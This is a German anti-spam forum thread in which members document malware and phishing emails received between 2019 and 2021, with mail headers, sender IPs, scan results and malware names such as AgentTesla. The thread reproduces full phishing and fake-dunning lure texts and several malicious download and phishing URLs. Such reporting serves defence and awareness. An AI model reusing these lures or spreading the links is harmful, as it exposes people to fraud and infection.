Verkauft von:

*Amazon EU S.a.r.L.
*
Versandart:

*Standardversand
*


Der Name des Transportdienstes und die Paketverfolgungsnummer liegen uns nicht vor.

Wenn Sie ein mobiles Gerät verwenden, können Sie mit der kostenlosen Amazon
Mobile App
Lieferbenachrichtigungen empfangen und den Verlauf Ihrer Sendung auch unterwegs
verfolgen.

Einzelheiten Ihrer Bestellung

Zwischensumme: EUR 146,70
Verpackung und Versand: EUR 2,95
*Endbetrag:* *EUR 149,65*
Zahlung über Bankeinzug: EUR 149,65


Rücksendungen sind einfach. Besuchen Sie unser Online-Rücksendezentrum

Ein relativ gut gemachte Fake-Bestellung, die man natürlich nie getätigt hat, die aber Neugier wecken soll. Phishing, könnte man meinen.
Aber, die Links führen zu:

http://www.web.pa-cirebon.go.id/Amazon/DE/Kunden-transaktion/01_19
IP: 68.171.209.92 ---> ACENET, INC.

Da gibt es kein Phishing, sondern der Download einer Makro-verseuchten .doc Datei: BESTELLDETAILS_DATEI

Bisher melden nur wenige Virenscanner: Trojan.Valyria

schara56
19.02.2019, 18:40
Received: from nwagbaragq.localdomain (unknown [185.61.138.206])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 19 Feb 2019 xx:xx:xx +0100 (CET)
Im Anhang eine DHL SHIPMENT NOTIFICATION&UPDATE.ace
https://virusscan.jotti.org/de-DE/filescanjob/6xe7qbowc1

Scan abgeschlossen. 7/15 Scanner haben Malware gemeldet.

schara56
01.03.2019, 06:20
Received: from sonic314-41.consmr.mail.bf2.yahoo.com (sonic314-41.consmr.mail.bf2.yahoo.com [74.6.132.215])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Thu, 28 Feb 2019 xx:xx:xx +0100 (CET)
Im Anhang eine 'order confirm.zip'
https://virusscan.jotti.org/de-DE/filescanjob/gnmslznwi1
https://www.virustotal.com/#/file/010742528a1e2fde072769ce0e060dd178a3a3fbf40a838939b682d1575d58eb/detection

schara56
14.03.2019, 16:47
Received: from blue.dnsnetservice.com (unknown [198.20.76.166])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Thu, 14 Mar 2019 xx:xx:xx +0100 (CET)
Received: from blue.dnsnetservice.com ([127.0.0.1]) by blue.dnsnetservice.com with MailEnable ESMTP; Thu, 14 Mar 2019 xx:xx:xx -0500

Sehr geehrte(r) x,

wie vereinbart haben wir versucht den Betrag für Ihre letzte Bestellung von
Ihrem Girokonto abzubuchen. Die Bezahlung Ihrer Bestellung konnte damit nicht
abgeschlossen werden.
Wir fordern Sie mit dieser Mahnung auf, den nicht beglichenen Betrag in Höhe von
EUR 950,69 bis spätestens 20.03.2019 unter Angabe des Verwertungszwecks NR
9878066 auf unser Konto zu überweisen.

sehr alte
aber damals korrekte

Anschrift


Ihre persönliche Rechnung finden Sie unter folgender Adresse
http://pwetech.com/wp-admin/*schnapp*.zip>

Nach Ablauf Ihrer Frist wird unser Anwalt ein gerichtliches Mahnverfahren gegen
Sie x einleiten.

Mit freundlichen Grüßen

PAYONE GmbH
89250 Senden
USt-ID: [ID filtered]
Sitz der Gesellschaft: Senden

schara56
29.04.2019, 14:25
Received: from sg2nlshrout02.shr.prod.sin2.secureserver.net (sg2nlshrout02.shr.prod.sin2.secureserver.net [182.50.132.194])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Sat, 27 Apr 2019 xx:xx:xx +0200 (CEST)
Received: from itztushar2007 by sg2plcpnl0219.prod.sin2.secureserver.net with local (Exim 4.91)
(envelope-from <buchhaltung [at] spachanakyaclub.com>)
ID: [ID filtered]
for x; Fri, 26 Apr 2019 xx:xx:xx -0700
Diese Mal angeblich von der Kids&Home Aktiengesellschaft (was natürlich nicht stimmt):

Guten Tag x,

wir haben festgestellt, dass die Mahnung Nr. 34289628 immer noch nicht bezahlt
wurde.

Wir geben Ihnen jedoch noch eine letzte Chance, Ihre vertragliche Verpflichtung
zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 877,00
EURO an uns zur Zahlung bringen.
Die Einzelheiten der Bestellung und die Bankdaten können Sie dem Onlineshop
unter der Website sehen
http://discountfurnituredecorblog.com/D.12-5093738124577411498272.zip.

Falls die Rechnung nicht bezahlt wird, sind wir außerdem gesetzlich dazu
verpflichtet Vollstreckungsmaßnahmen gegen Sie einzuleiten. Um Ihnen diese
Unannehmlichkeit zu vermeiden, sollten Sie die Rechnung umgehend zahlen.
x beachten Sie, die Folgen des Verzugs bestehen vor allem in
der Regresspflicht des Schuldners sowie in einer verschärften Haftung.

Kids&Home Aktiengesellschaft
91207 Lauf a.d.Pegnitz

USt-ID: [ID filtered]
Direktor A* M*

Scan finished. 11/15 scanners reported malware.
https://virusscan.jotti.org/en-US/filescanjob/am60kl4y91

30 engines detected this file
https://www.virustotal.com/gui/file/88e435f98e9cbf8978934debe2111577a51571dea41094f9515df13873e47611/detection

Nachtrag - gleiche Shice
Received: from a2nlsmtp01-01.prod.iad2.secureserver.net (a2nlsmtp01-01.prod.iad2.secureserver.net [198.71.224.24])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Mon, 29 Apr 2019 xx:xx:xx +0200 (CEST)
Received: from a2plcpnl0049.prod.iad2.secureserver.net ([198.71.225.135])
by : HOSTING RELAY : with ESMTP
ID: [ID filtered]

Guten Tag x,

es wurde festgestellt, dass die Rechnung Nr. 40412779 immer noch nicht bezahlt
wurde.
Wir geben Ihnen jedoch trotzdem noch eine letzte Möglichkeit, Ihre vertragliche
Verpflichtung zu erfüllen, indem Sie innerhalb von 7 Tagen die ausstehende Summe
in Höhe von 633,00 EURO an uns zur Zahlung bringen.
Die Details Ihrer Bestellung und die Kontodaten können Sie dem Onlineshop unter
der Webseite entnehmen
http://blog.lavororural.com.br/ID.89-87274115190-025135506624.zip.

Falls der Schuldbetrag nicht überwiesen wird, sind wir verpflichtet
Vollstreckungsmaßnahmen gegen Sie einzuleiten. Um Ihnen diese Unannehmlichkeit
zu ersparen, sollten Sie die Rechnung umgehend bezahlen.
x beachten Sie, die Folgen des Verzugs bestehen vor allem in
der Regresspflicht des Schuldners sowie in einer verschärften Haftung.
Jewels24 Aktiengesellschaft
76133 Karlsruhe


USt-ID: [ID filtered]
Direktor J* S*


Scan finished. 2/15 scanners reported malware.

11 engines detected this file(von 63)

schara56
01.05.2019, 09:30
Received: from server.linux64.papaki.gr (server.linux64.papaki.gr [88.99.26.12])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Wed, 1 May 2019 xx:xx:xx +0200 (CEST)
Received: from webmail.xima.gr (localhost.localdomain [IPv6:::1])
by server.linux64.papaki.gr (Postfix) with ESMTPSA ID: [ID filtered]
Wed, 1 May 2019 xx:xx:xx +0300 (EEST)

Hello,

Greeting to you.

We are currently looking forward to procure listed items/services in the
attached file and we believe that your company can assist us with the
request.
We appreciate to receive your valuable offer at the earliest for 40ft
container. Kindly send us a regret mail if our request is not in your
scope.
Thank you for your support. Have a nice day.

Best regards!

--

Olá,

Saudação a você.

No momento, estamos ansiosos para adquirir itens / serviços listados no
arquivo anexo e acreditamos que sua empresa pode nos ajudar com a
solicitação.
Agradecemos por receber sua valiosa oferta o mais rápido possível para
contêiner de 40 pés. Por favor, envie-nos um e-mail se o nosso pedido
não estiver no seu escopo.
Obrigado pelo seu apoio. Tenha um bom dia.

Cumprimentos!

ANDRE CARVALHO

GERENTE DE COMPRAS/PROCUREMENT MANAGER | www.mjmartinha.pt [1]

Links:
------
[1] http://mjmartinha.pt/

Im Anhang eine REQUEST FOR QUOTATION 7946508.PDF.7z

Scan abgeschlossen. 2/15 Scanner haben Malware gemeldet.

8 engines detected this file(von 58).

Oh, fein! Ich sehe gerade, die Spam kommt über die IPs von Hetzner:

inetnum: 88.99.26.0 - 88.99.26.63
netname: HETZNER-fsn1-dc1
descr: Hetzner Online GmbH
descr: Datacenter fsn1-dc1
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
created: 2018-03-15Txx:xx:xxZ
last-modified: 2018-03-15Txx:xx:xxZ
source: RIPE

isenaecher
03.05.2019, 11:37
Ein Header wäre hier sehr interessant zum Vergleichen.
Habe heute ebenfalls so eine Drohmail bekommen, allerdings nicht von €urocollect. Die Drohkulisse ist ähnlich
Return-Path: <info [at] performanceignited.com>
Delivered-To: 3 [at] 1984873
Received: from imap-director-4.novalocal ([10.10.2.21])
by imap-backend-39.novalocal with LMTP ID: [ID filtered]
for <3 [at] 1984873>; Thu, 02 May 2019 xx:xx:xx +0000
Received: from mx021l.vodafonemail.xion.oxcs.net ([10.10.2.21])
by imap-director-4.novalocal with LMTP ID: [ID filtered]
; Thu, 02 May 2019 xx:xx:xx +0000
Received: from mx007.vodafonemail.xion.oxcs.net (mta-11.mta.xion.oxcs.net [10.10.2.11])
(using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits))
(No client certificate requested)
by mx021l.vodafonemail.xion.oxcs.net (Postfix) with ESMTPS ID: [ID filtered]
for <meine adresse bei arcor.de>; Thu, 2 May 2019 xx:xx:xx +0000 (UTC)
Received: from mta-p1.oxcloud-vadesecure.net (mta-p1.oxcloud-vadesecure.net [157.97.76.183])
(using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits))
(No client certificate requested)
by vsmx001.vodafonemail.xion.oxcs.net (Postfix) with ESMTPS ID: [ID filtered]
for <meine adresse bei arcor.de>; Thu, 2 May 2019 xx:xx:xx +0000 (UTC)
Received: from host.nogoingback.co (host.nogoingback.co [67.227.196.14])
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(No client certificate requested)
by mta-p1.oxcloud-vadesecure.net (ox1mtai54p) with ESMTPS ID: [ID filtered]
for <meine adresse bei arcor.de>; Thu, 2 May 2019 xx:xx:xx +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed;
d=performanceignited.com; s=default; h=Message-Id:Content-Transfer-Encoding:
Content-Type:MIME-Version:Subject:From:To:Date:Sender:Reply-To:Cc:Content-ID:
Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc
:Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe:
List-Subscribe:List-Post:List-Owner:List-Archive;
bh=xrn0BX5MaM1uVCQ0wWN5P+w8xBXVvczqQLWQw/Q5N+U=; b=frUDeYRKi3R0poviJ5NNmNSVsT
/KQc2Fz3JbOnTqK3508NrsBJuvQY01mAHxeiZTErpfOs/dhDXyToLcdeNIl96Rhlz4V6586IfKL35
4dhN5xcdxQY9nVBb2ldK/dTreLoE0KN6T3fJsHmd5IikGO+B6ZZa2Y71V3vFBr1TLEEKhmxibbRv9
PLiF0hIDYoDN3u14/trYgsn00M0iYsCrj18hQ93FCfHhYWLo2FHT1FC0/8JyPQZZj190jGzOJZuTP
GRndrMFsRlmYxCeJd+Z1eXHj1MrMYy9973FVLUmv4qH6OkoqkKxzk92l5mFgRk+Xd7E12v5GET3M+
Dw75vDMg==;
Received: from sepexco by host.nogoingback.co with local (Exim 4.91)
(envelope-from <info [at] performanceignited.com>)
ID: [ID filtered]
for meine adresse bei arcor.de; Thu, 02 May 2019 xx:xx:xx -0700
Date: Thu, 2 May 2019 xx:xx:xx +0000
To: meinVorname meinNachname <meine adresse bei arcor.de>
From: SportFischmann GmbH Jakob Schwarz <info [at] performanceignited.com>
Subject: =?utf-8?Q?Konto-Lastschrift_konnte_nicht_durchgef=C3=BChrt_werden_02.05.2?=
=?utf-8?Q?019?=

Sehr geehrter Kunde meinVorname meinNachname,

wir haben feststellen müssen, dass die Rechnung NR 84440331 immer noch nicht ausgeglichen wurde.

Wir geben Ihnen trotzdem noch eine letzte Chance, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie innerhalb von 3 Tagen die ausstehende Rechnung in Höhe von 634,00 EURO an uns zahlen.

Die Bestelleinzelheiten und die Kontodaten können Sie dem für Sie vorbereiteten Dokument unter der Website ansehen.

Falls die Rechnung nicht ausgeglichen wird, sind wir verpflichtet Vollstreckungsmaßnahmen gegen Sie einzuleiten. Um Ihnen diese Unannehmlichkeit zu ersparen, sollten Sie die Rechnung umgehend begleichen.

Vorname Nachname beachten Sie, der Schuldner ist zum Ersatz des Verzögerungsschadens verpflichtet, er schuldet also Schadensersatz nach § 280 Abs. 2, § 286 BGB.

SportFischmann GmbH
42853 Remscheid

USt-ID: [ID filtered]
Geschäftsführer Jakob S.

Die Firma SportFischmann gibt es wirklich, allerdings nicht in Remscheid, sondern in Thüringen. Die USt-ID: [ID filtered]

Der Server steht in den USA 67.227.196.14
Die Absenderadresse auchinfo [at] performanceignited.com
Der Spam kam diesmal über meine Arcor-Adresse, die ansonsten von Spam ziemlich sauber ist. Kommt vielleicht daher, das vodafonemail.xion.oxcs seine Server mittlerweile auch in den USA zu stehen hat.

Der Link zum Dokument führt hierhin http://www.stevephotoshoot.com/C-24-86131771651743876029.zip Sowas mache ich ohne virtuelle Maschine aber nicht auf

Spikes
03.05.2019, 11:49
@isenaecher
das hört sich aber nach einer pishing-mail wie in diesem Thread der Beitrag 448 (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-für-xxx-Mahnung&p=434574#post434574) nicht nach €urocollect an.

isenaecher
03.05.2019, 12:59
Möglich wärs.

Ist auf jeden Fall wesentlich professioneller aufgemacht, als die "Mahnungen" die bis jetzt bei mir aufgeschlagen sind.

Im Falle diesen Falles Mods bitte tackern.

Modedit:
[x] getackert

schara56
03.05.2019, 19:36
Ist Malware:
https://virusscan.jotti.org/en-US/filescanjob/uncuqy3x4z
https://www.virustotal.com/gui/file/d4ff68c6653856c3cf2c1c2aa314cbecdb9af8c25f558d40d5b9529e2188dc2e/detection

schara56
15.05.2019, 05:18
Received: from mail.bwbilisim.com (server-178.211.54.211.as42926.net [178.211.54.211])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 14 May 2019 xx:xx:xx +0200 (CEST)
Received: from ([154.124.24.90]) by bwbilisim.com with MailEnable WebMail; Tue, 14 May 2019 xx:xx:xx +0300
Im Anhang eine Payment Confirmation.zip

Virustotal (https://www.virustotal.com/gui/file/088a063313f1ae9295ea12f5e62b01b3a460405e6a620c7035d89449cc6e7b21/detection)
Jotti (https://virusscan.jotti.org/en-US/filescanjob/7ivngrd3lx)

schara56
14.06.2019, 05:48
Received: from gmail.com (unknown [185.222.57.85])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Thu, 13 Jun 2019 xx:xx:xx +0200 (CEST)


Good day,

Please find attached Vaka Online Hardware Quotation for the items
requested.Your order was successfully collected thank for doing
business with Vaka.

DID: [ID filtered]
stand a chance to win free 10 bags of PC 15 cement through a
raffle draw of all sales to be made this month, then a random
pick will be done and sale to be picked will be our winner, you
could be our May winner, so DON'T MISS OUT!!

Vaka Sales Team
O*

CALL OR WHATSAPP ON:
0778 335 057
VISIT US: SHOP 13 LONGCHENG PLAZA, BELVEDERE, CNR SAMORA AND
MUTLEY BEND, HARARE

Der Anhang entsprechent "interessant":
https://www.virustotal.com/gui/file/6a9203d92b58056ebc5955463366014d6deccec113779a6f00c5ec0275595258/detection
https://virusscan.jotti.org/en-US/filescanjob/fz22l0d4vj

schara56
18.06.2019, 10:09
Im Anhang eine Excel-Tabelle.
Received: from mail.agasi.com.my (ptr1.agasi.com.my [101.99.66.21])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 18 Jun 2019 xx:xx:xx +0200 (CEST)
[...]
Received: from [::1] (port=53316 helo=agasi.com.my)
by vps13276.agasi.com.my with esmtpa (Exim 4.91)
(envelope-from <rbaleros [at] hamad.qa>)
ID: [ID filtered]
Received: from 154.124.25.90 ([154.124.25.90])
(SquirrelMail authenticated user poor [at] spamvictim.tld)
by agasi.com.my with HTTP;
Mon, 17 Jun 2019 xx:xx:xx -0000

Dear Sir,

Kindly find attached the bank transfer for the whole amount.

Thank you.
I remain at your disposal should you require any further information.

Best regards.

R* B* N*

Purchasing & Production Manager

L'atelier du miel

Tabaris, Beirut,
+961 (71) 002608
www.atelierdumiel.com
https://virusscan.jotti.org/en-US/filescanjob/jtnxkulp4p
https://www.virustotal.com/gui/file/fc9c145865b7a53e7e77d39efc4aaa9bac3b0f51d0f948e7a30dc4b18e5a2cdb/detection

Arthur
18.06.2019, 10:21
Im Anhang eine Excel-Tabelle.

Exploit.CVE-2017-11882.Gen obwohl schon etwas "betagt" (11.2017) wird immer wieder als Einfallstor genutzt.
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882
https://blog.trendmicro.de/angriff-mit-ungewoehnlicher-installationsmethode-fuehrt-zu-lokibot/

schara56
17.07.2019, 05:28
Received: from pore.com (unknown [216.108.232.82])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Wed, 17 Jul 2019 xx:xx:xx +0200 (CEST)
Received: from mail.ohioz.cf (localhost [IPv6:::1])
by pore.com (Postfix) with ESMTPA ID: [ID filtered]
Tue, 16 Jul 2019 xx:xx:xx -0700 (PDT)

Good Day,

I have tried your Office number but seems not connecting, please see
attached payment made today on behalf of our client who is your customer
as advance payment for the shipment, check the attached remittance
details and let us know if the bank details marked in red is correct.

P* S*

PwC | Corporate Finance | Associate Director
Office: +64 3 374 304 | Mobile: +64 27 308 9181
Pricewaterhouse Coopers New Zealand
5 Sir Gil Simpson Drive, Canterbury Technology Park, Christchurch 8053,
New Zealand

Mit einem schönen Anhang, versteht sich:
https://www.virustotal.com/gui/file/84293ae74d22f2ee2c3ba73ff39ddce93dd7936ec1394bc81ffce7674a28ab48/detection
https://virusscan.jotti.org/en-US/filescanjob/65947ceiug

schara56
17.07.2019, 21:41
Received: from x (x [82.149.229.6])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Wed, 17 Jul 2019 xx:xx:xx +0200 (CEST)
X-Greylist: delayed 4259 seconds by postgrey-1.32 at mx2; Wed, 17 Jul 2019 xx:xx:xx CEST
Received: from sendmail.contentgrill.com (sendmail.contentgrill.com [13.232.241.17])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Wed, 17 Jul 2019 xx:xx:xx +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
by sendmail.contentgrill.com (Postfix) with ESMTP ID: [ID filtered]
Wed, 17 Jul 2019 xx:xx:xx +0000 (UTC)
Received: from sendmail.contentgrill.com ([127.0.0.1])
by localhost (sendmail.contentgrill.com [127.0.0.1]) (amavisd-new, port 10032)
with ESMTP ID: [ID filtered]
Received: from localhost (localhost [127.0.0.1])
by sendmail.contentgrill.com (Postfix) with ESMTP ID: [ID filtered]
Wed, 17 Jul 2019 xx:xx:xx +0000 (UTC)
X-Virus-Scanned: amavisd-new at contentgrill.com
Received: from sendmail.contentgrill.com ([127.0.0.1])
by localhost (sendmail.contentgrill.com [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP ID: [ID filtered]
Received: from sendmail.contentgrill.com (sendmail.contentgrill.com [10.0.1.92])
by sendmail.contentgrill.com (Postfix) with ESMTP ID: [ID filtered]
Wed, 17 Jul 2019 xx:xx:xx +0000 (UTC)

Good day,

Please find attached OUR Request For Quotation and kindly quote your best price for the

listed goods.

Kindly advise the following details:
- Your FOB Prices and FOB Port of loading.
- Your Mode of Payment.(L/C or T/T)
- Your estimated delivery time

Awaiting your best offer.

Best Regards

Jetzt ist eine ISO-Datei im Anhang.
https://virusscan.jotti.org/en-US/filescanjob/8dmwm6dx04
https://www.virustotal.com/gui/file/4e17a06b5b33b33201b540715600bc0d3f2b4a04781baf07398c8c91d1ed33d5/detection

kjz1
03.08.2019, 16:05
Heute eingetrudelt:

Received: from mysmtp5.southcentralus.cloudapp.azure.com
([13.84.176.201]) by
mx-ha.gmx.net (mxgmx016 [212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from SureboyRDP.ndghby3tobievon1xedvkal13c.xx.internal.cloudapp.net (unknown
[52.175.230.219]) by mysmtp5.southcentralus.cloudapp.azure.com (Postfix) with ESMTPA ID: [ID filtered]


REMINDER!!!

Dear Customer,

We attempted to deliver your item at 2:30pm on 1st August, 2019. (Read
enclosed file details)
The delivery attempt failed because nobody was present at the shipping
address, so this notification has been automatically sent.

If the parcel is not scheduled for re-delivery or picked up within 72
hours, it will be returned to the sender.

Label Number: (Read enclosed file details)
Class: Package Services
Service(s): (Read enclosed file details)
Status: e-Notification sent

Read the enclosed file for details.

Als Anhang:


Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Details.img"

Wahrscheinlich ein Verschlüsselungstrojaner, der jedoch noch nicht von allen Antivirenprogrammen erkannt wird.

kjz1
02.01.2020, 09:04
Received: from mail-wm1-f68.google.com ([209.85.128.68]) by mx-ha.gmx.net
(mxgmx115 [212.227.17.5]) with ESMTPS (Nemesis) ID: [ID filtered]
for <x>; Wed, 01 Jan 2020 xx:xx:xx +0100
Received: by mail-wm1-f68.google.com with SMTP ID: [ID filtered]
for <x>; Wed, 01 Jan 2020 xx:xx:xx -0800 (PST)
X-Received: by 2002:a05:600c:224d:: with SMTP ID: [ID filtered]
Wed, 01 Jan 2020 xx:xx:xx -0800 (PST)
Received: from sendandsend ([80.240.26.142])
by smtp.gmail.com with ESMTPSA ID: [ID filtered]
(version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
Wed, 01 Jan 2020 xx:xx:xx -0800 (PST)


Ihr Konto wurde zum Kauf verwendet
auf einem Computer oder Gerät, das noch nie benutzt wurde
mit diesem Konto.

date: Wed, January 01, 2020 5:28 PM
order-number: EWNEDCJC
IP Address: 92.188.5.154

Suchen Sie das angehängte Dokument (PDF), um Ihren Kauf sofort zu
stornieren.

Das angehängte PDF verweist dann auf:

http://djslowsalahapaakuremix2019.com
IP: 162.241.70.217 -> 162-241-70-217.unifiedlayer.com

kjz1
05.01.2020, 14:53
Derselbe Phishki, es geht wohl um Amazon Account phishing:

Received: from mail-ot1-f67.google.com ([209.85.210.67]) by mx-ha.gmx.net
(mxgmx115 [212.227.17.5]) with ESMTPS (Nemesis) ID: [ID filtered]
for <x>; Sun, 05 Jan 2020 xx:xx:xx +0100
Received: by mail-ot1-f67.google.com with SMTP ID: [ID filtered]
for <x>; Sun, 05 Jan 2020 xx:xx:xx -0800 (PST)
X-Received: by 2002:a25:d18c:: with SMTP ID: [ID filtered]
Sun, 05 Jan 2020 xx:xx:xx -0800 (PST)
Received: from ip-172-31-28-85
(ec2-3-15-155-235.us-east-2.compute.amazonaws.com. [3.15.155.235])
by smtp.gmail.com with ESMTPSA ID: [ID filtered]
(version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
Sun, 05 Jan 2020 xx:xx:xx -0800 (PST)


Wir haben tolle Neuigkeiten! Ihre Bestellung ist bestätigt und wir
freuen uns
genauso wie Sie !.


date: Sun, January 05, 2020 9:01 AM
order-number: RDVWTIZI
IP Address: 49.243.81.169

Wenn Sie Fragen zu Ihrem Konto haben oder die Bestellung stornieren,
können Sie
die Anhangsdatei (PDF) anzeigen oder herunterladen.


Im angehängten PDF dann die URL:

http://behbahasa.com/QnKkt0e

weiter auf:

http://service1-cancelmy.purchase-amazon.invoice-en.com/?signin
IP: 162.241.70.217 -> 162-241-70-217.unifiedlayer.com

Unified Layer, noch so ein Laden, für den das Wort 'Abuse-Desk' ein absolutes Fremdwort darstellt...


Und noch, als eher seltenes Phishing für Delta Airlines:

Received: from mailout08.t-online.de (mailout08.t-online.de [194.25.134.20])
by xxxxx (Postfix) with ESMTPS
for <x>; Sat, 4 Jan 2020 xx:xx:xx +0100 (CET)
Received: from fwd19.aul.t-online.de (fwd19.aul.t-online.de [172.20.27.65])
by mailout08.t-online.de (Postfix) with SMTP ID: [ID filtered]
Sat, 4 Jan 2020 xx:xx:xx +0100 (CET)
Received: from [212.83.46.115]
(Thn9FcZLohh2mi3RmSjx8vauqTvtOhCS0o+gd1EBdzU5qqjTTo0Hhf8Zz4UPgxHQMX@[212.83.46.115])
by fwd19.t-online.de
with (TLSv1:DHE-RSA-AES256-SHA encrypted)
esmtp ID: [ID filtered]

gecrackt: immobilien-scheidt [at] t-online.de

IP: 212.83.46.115 -> 23media GmbH


PDATE YOUR DELTA SKYMILES ACCOUNT INFORMATION

Thank you for your Delta SkyMiles� account information. This message
confirms your SkyMiles account requires update.

To protect and keep your account up to date, Please UPDATE YOUR SKYMILES
immediately.

Please know the security of your account is, and will continue to be,
our priority.

We look forward to seeing you on board.

BOOK A FLIGHT >
BOOK A VACATION PACKAGE >
RESERVE A CAR + HOTEL >
EARN AND USE MILES >


STAY CONNECTED WITH US
UPDATE EMAIL PREFERENCES 02| 02 UNSUBSCRIBE 02| 02 PRIVACY POLICY



Terms and Conditions

Rules of SkyMiles Experiences Online | SkyMiles Experiences is
available only to existing SkyMiles Members within the 50 United States
and the District of Columbia with U.S. addresses. Merchandise may be
shipped only within the 50 United States and the District of Columbia.
Members must log in at delta.com and agree to the SkyMiles Experiences
Online Auction User Agreement in order to bID: [ID filtered]
bidder who has bID: [ID filtered]
will be named the winner. If the winner does not have sufficient miles
to cover the winning amount, a new winner will be chosen by a
predetermined process. Delta reserves the right to declare the winner or
cancel the auction if unusual circumstances occur.

Auction Items & Redemption: Bidding amounts on the website for the
above-featured SkyMiles Experiences may be higher than the stated
starting bID: [ID filtered]
auction items are subject to availability. Winning bids must be paid
entirely with miles. Your SkyMiles account balance must be sufficient to
cover the mileage needed for your winning bid. For full terms and
conditions, see the User Agreement .

Fees: No fees will apply.

Restrictions: All SkyMiles Program rules apply. To review the rules, see
Membership Guide & Program Rules. All offers subject to the terms and
conditions of each individual partner. Offers voID: [ID filtered]
law. Other restrictions may apply.

Miscellaneous: Offers and participating partners are subject to change
without notice.
Comment or Complaint?
� 2020 Delta Air Lines, Inc. All rights reserved.
Delta Blvd. P.O. Box 20706 22 Atlanta, GA 30320-6001


Wordpress gecrackt:

http://dineatvine.com/wp-includes/js/us/delta.com/index.php
IP: 192.185.91.245 -> 192-185-91-245.unifiedlayer.com

kjz1
17.10.2020, 14:44
Selbst vor Virenverteilung schreckt evil Google als Gehilfe nicht zurück:

Received: from kirmani.pair.com (kirmani.pair.com [209.68.5.161])
by xxxxx (Postfix) with ESMTPS
for <x>; Sat, 17 Oct 2020 xx:xx:xx +0200 (CEST)
Received: by kirmani.pair.com (Postfix, from userID: [ID filtered]
ID: [ID filtered]


This link will work only for xxxxx.
Hi xxxxx,

You just obtained (2) new attachments. See new attachment Details below.

Uni-koblenz_DataSheet.xls

Sales_Report_20201016.ppt



Microsoft OneDrive

URL nicht OneDrive, sondern evil Google mit personalisiertem Anhang:

http://41.123.83.34.bc.googleusercontent.com/eed?...

kjz1
20.10.2020, 14:45
Seltsame Mail, wo der Spammer offensichtlich seine Ratware nicht im Griff hat:

Received: from scultworld.info ([104.234.231.90]) by mx-ha.gmx.net (mxgmx015
[212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]
<x>; Tue, 20 Oct 2020 xx:xx:xx +0200

info [at] scultworld.info

Als Text nur:


Subject: Sie haben einen uberfalligen Kredit
hello
Roberto Rossi

Ein Link führt zu einem (nicht existierenden) Bild:

http://overstockpartysupplies.com/link.php

Der Link selbst führt zu evil Google (ohne irgendwelche Anhänge).

schara56
04.08.2021, 20:09
Received: from hp0.txzize.club (hp0.txzize.club [134.209.84.243])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Wed, 4 Aug 2021 xx:xx:xx +0200 (CEST)
[...]
Subject: NEW ORDER FOR AUGUST 2021

Im Anhang eine PURCHASE ORDER N0. 27652340010911001.gz

https://www.virustotal.com/gui/file/6b640a67aac7974f45f583dfa0f2df199918a5fa3e1f51412e6cb6d3cba72c20/detection
https://virusscan.jotti.org/en-US/filescanjob/a11ene7rvs

Arthur
04.08.2021, 20:33
Trojan:Win32/AgentTesla!ml
https://www.win-10-forum.de/threads/windows-10-meldet-win32-agenttesla-ml-wie-kann-man-den-trojaner-agenttesla-ml-entfernen.156413/

AgentTesla, auch oft im Internet mit den Schreibweisen Agent Tesla, Win32/AgentTesla!ml oder nur AgentTesla!ml zu finden, ist in der Lage Passwörter abzugreifen oder auch die Tastatureingaben der Anwender*innen zu erkennen und so eben auch Passwörter und andere sensible Daten zu tracken. Erhalten kann man ihn recht leicht, da er sich innerhalb einer Installationsroutine oder auch in einem Anhang einer E-Mail befinden kann,

schara56
14.09.2021, 15:40
Received: from node1.gakoin.com (node1.gakoin.com [134.213.27.111])
by x (Postfix) with ESMTP ID: [ID filtered]
for <x>; Tue, 14 Sep 2021 xx:xx:xx +0200 (CEST)

Im Anhang eine "RFQ 8042 PR 20589 Fabrication and supply of specified ducting.tar.gz", die es in sich hat.
https://www.virustotal.com/gui/file/a2a865e67856764895f4456e11451f847bde25d19b73aeecba3e5a0566db705a
